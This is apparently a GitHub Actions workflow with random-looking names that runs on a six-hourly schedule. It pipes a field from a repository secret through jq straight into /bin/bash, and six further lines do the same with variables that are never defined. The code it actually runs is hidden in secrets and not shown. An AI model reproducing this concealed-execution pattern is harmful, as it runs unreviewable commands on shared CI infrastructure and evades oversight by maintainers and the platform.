name: qianxuanbutong

on:
  workflow_dispatch:
  schedule:
    - cron: '26 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qianxuanbutong
        env:
          tyva37227: ${{ secrets.tyva37227 }}
        run: |
          echo $tyva37227 | jq -r .wjdmh0 | /bin/bash
          echo $apyr94806 | jq -r .c4369 | /bin/bash
          echo $gsb6 | jq -r .oj83 | /bin/bash
          echo $rkues31 | jq -r .dhnov345 | /bin/bash
          echo $gjsz57 | jq -r .yoxbq6566 | /bin/bash
          echo $tumiw5774 | jq -r .pg56573 | /bin/bash
          echo $grwje7423 | jq -r .hrvig337 | /bin/bash

